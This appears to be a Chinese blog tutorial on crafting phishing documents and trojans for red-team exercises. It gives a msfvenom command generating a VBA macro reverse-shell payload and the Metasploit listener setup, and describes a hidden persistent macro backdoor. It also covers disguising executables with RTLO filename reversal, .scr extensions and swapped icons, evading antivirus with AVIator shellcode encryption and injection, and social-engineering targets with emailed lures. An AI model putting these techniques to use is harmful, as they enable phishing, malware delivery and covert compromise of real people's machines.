釣魚文件在護網中起着重要的作用,今天我就來演示幾種比較常見的釣魚文件(大佬勿噴)
一、office宏攻擊
宏是微軟公司為其OFFICE軟件包設計的一個特殊功能,有着獨特的文件后綴名,如:xlsm,docm,pptm等。
1.msf生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o fei.vba
-f指定生成vba宏語言的攻擊payload
首先新建一個支持文件宏的office文件,以.docm進行演示。
首先選擇文件-選項-自定義功能區-開發工具。
點擊宏按鈕,創建一個新的文件宏。
然后保存
然后將docm文件另存為Doc2.docm
msf開啟監聽
use /exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.0.111 set LPORT 4000
然后用word啟動Doc2.docm,成功上線
2.cs生成payload
cs也支持生成office宏代碼。
選擇一個監聽器
復制代碼到宏代碼框中
上線成功
3.全局宏建立持久型后門
類似office宏還有一些其它利用方式,如DOCX文檔遠程模板注入執行宏,還可以通過shellcode進行免殺處理。在實戰中,首先盡可能社工目標的各種信息,取得對方信任,根據釣魚的目標,修改文檔的名字,通過郵箱進行發送,如xx公司采購說明。
office宏釣魚存在幾大不適用性:
1、對方電腦未使用office。
2、office默認禁用宏,打開文件會進行提示。
3、獨特的宏文件后綴,docm,xlsm等,容易引起他人懷疑。
4、免殺性要求較高。
office宏除了用於釣魚,還可以用來建立隱蔽的持久性后門。新建一個宏,位置要選擇所有活動模版和文檔。
在ThisDocument中寫入宏代碼,進行保存。
成功建立了一個隱藏持久性后門,打開任意文檔都可以觸發宏代碼,殺軟並未攔截
cs成功上線
二、可執行exe文件
msf和cs都可以生成反彈木馬,通過鼠標點擊的方式進行觸發。exe木馬用於釣魚,主要解決的問題有三個:
1 、后綴名隱藏
2、文件圖標更換
3、文件免殺
1.后綴名隱藏
https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183/
經典的".jpg.exe"
默認情況下,Windows隱藏已知的文件擴展名。
使用.scr擴展名
scr等同於exe后綴名。
Unitrix反轉后綴
更改文件名為:重要資料xgpj.scr
光標移動到g之前選擇RLO反轉。
反轉后的命名“重要資料xrcs.jpg”
經過測試,使用.scr擴展名和Unitrix反轉后綴會被360直接報毒。
2.文件圖標更換
使用Restorator對exe文件進行圖標更改。
把木馬文件和想要替換的目標exe都拖入到軟件中。
拖拽360圖標到beacon1.exe中,保存文件,成功替換圖標。
3.文件免殺
AVlator免殺
AVIator是一個后門生成器實用程序,它使用加密和注入技術來繞過AV檢測,並且自帶了RTLO和更改圖標功能。
使用AES加密來加密給定的shellcode
生成包含加密有效負載的可執行文件
使用各種注入技術將shellcode解密並注入目標系統
共有三個表單:
分別存放用於加密shellcode的加密密鑰的文本,AES加密的IV的文本和shellcode的文本。
程序左方給出了在msf框架下的利用步驟。
本次使用cs進行演示。
1、生成c#的payload
2、保留16進制,使用notepad++去除空格
3、復制到payload框中進行加密
目標操作系統架構根據實際情況選擇就可以,x86比較通用一些。
下面還有個Injection Techniques,需要選擇注入技術,我這選擇第二個注入Notepad++進程
另外,軟件還提供了RTLO選項,可以使可執行文件名看起來偽裝性更好。比如,啟用該選項后,文件bbbgpj.scr將被保存文件名為bbbrcs.jpg,但文件還是可以正常被當做exe執行的。但是,選擇了RTLO選項雖然更迷惑人,但也更容易被殺軟報警告。
還可以自定義程序ico圖標,增強偽裝
點擊generate后就可以生成后門程序了。
運行bbbrcs.jpg,cs成功上線
4、可以選擇反轉后綴(會被某些殺毒識別為惡意軟件),替換圖標,選擇注入技術,成功生成文件。
可以繞過大多數的殺軟。
三、powershell免殺
參考我的上篇博客powershell免殺
參考:遠控免殺專題(14)-AVIator(VT免殺率25/69)